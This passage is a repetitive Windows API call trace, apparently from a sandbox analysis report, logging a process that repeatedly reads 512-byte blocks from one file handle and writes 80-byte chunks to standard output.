lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] GetFileType (hFile=0x4c) returned 0x1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] GetFileType (hFile=0x4c) returned 0x1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: 
lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] GetFileType (hFile=0x4c) returned 0x1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] GetFileType (hFile=0x4c) returned 0x1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] GetFileType (hFile=0x4c) returned 0x1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.912] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.912] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.912] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.912] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] GetFileType (hFile=0x4c) returned 0x1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] GetFileType (hFile=0x4c) returned 0x1 [0092.912] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0092.912] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] GetFileType (hFile=0x4c) returned 0x1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] GetFileType (hFile=0x4c) returned 0x1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] GetFileType (hFile=0x4c) returned 0x1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] GetFileType (hFile=0x4c) returned 0x1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] GetFileType (hFile=0x4c) returned 0x1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0092.912] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] GetFileType (hFile=0x4c) returned 0x1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.913] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.913] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.913] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.913] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] GetFileType (hFile=0x4c) returned 0x1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] GetFileType (hFile=0x4c) returned 0x1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] GetFileType (hFile=0x4c) returned 0x1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 
[0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] GetFileType (hFile=0x4c) returned 0x1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] GetFileType (hFile=0x4c) returned 0x1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] GetFileType (hFile=0x4c) returned 0x1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] GetFileType (hFile=0x4c) returned 0x1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] GetFileType (hFile=0x4c) returned 0x1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.914] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0092.914] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.914] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.914] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] GetFileType (hFile=0x4c) returned 0x1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] GetFileType (hFile=0x4c) returned 0x1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] GetFileType (hFile=0x4c) returned 0x1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] GetFileType (hFile=0x4c) returned 0x1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] GetFileType (hFile=0x4c) returned 0x1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] GetFileType (hFile=0x4c) returned 0x1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] GetFileType (hFile=0x4c) returned 0x1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] GetFileType (hFile=0x4c) returned 0x1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.915] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.915] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.915] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.915] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] GetFileType (hFile=0x4c) returned 0x1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] GetFileType 
(hFile=0x4c) returned 0x1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] GetFileType (hFile=0x4c) returned 0x1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] GetFileType (hFile=0x4c) returned 0x1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] GetFileType (hFile=0x4c) returned 0x1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] GetFileType (hFile=0x4c) returned 0x1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] GetFileType (hFile=0x4c) returned 0x1 [0092.915] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] GetFileType (hFile=0x4c) returned 0x1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.916] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.916] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.916] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.916] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] GetFileType (hFile=0x4c) returned 0x1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] GetFileType (hFile=0x4c) returned 0x1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] GetFileType (hFile=0x4c) returned 0x1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, 
lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] GetFileType (hFile=0x4c) returned 0x1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] GetFileType (hFile=0x4c) returned 0x1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] GetFileType (hFile=0x4c) returned 0x1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] GetFileType (hFile=0x4c) returned 0x1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] GetFileType (hFile=0x4c) returned 0x1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, 
lpOverlapped=0x0) returned 1 [0092.917] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.917] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.917] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.917] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] GetFileType (hFile=0x4c) returned 0x1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] GetFileType (hFile=0x4c) returned 0x1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] GetFileType (hFile=0x4c) returned 0x1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] GetFileType (hFile=0x4c) returned 0x1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] GetFileType (hFile=0x4c) returned 0x1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] WriteFile (in: hFile=0x4c, 
lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] GetFileType (hFile=0x4c) returned 0x1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] GetFileType (hFile=0x4c) returned 0x1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] GetFileType (hFile=0x4c) returned 0x1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.918] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.918] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.918] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.918] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] GetFileType (hFile=0x4c) returned 0x1 [0092.918] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0092.918] GetFileType (hFile=0x4c) returned 0x1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] GetFileType (hFile=0x4c) returned 0x1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] GetFileType (hFile=0x4c) returned 0x1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] GetFileType (hFile=0x4c) returned 0x1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 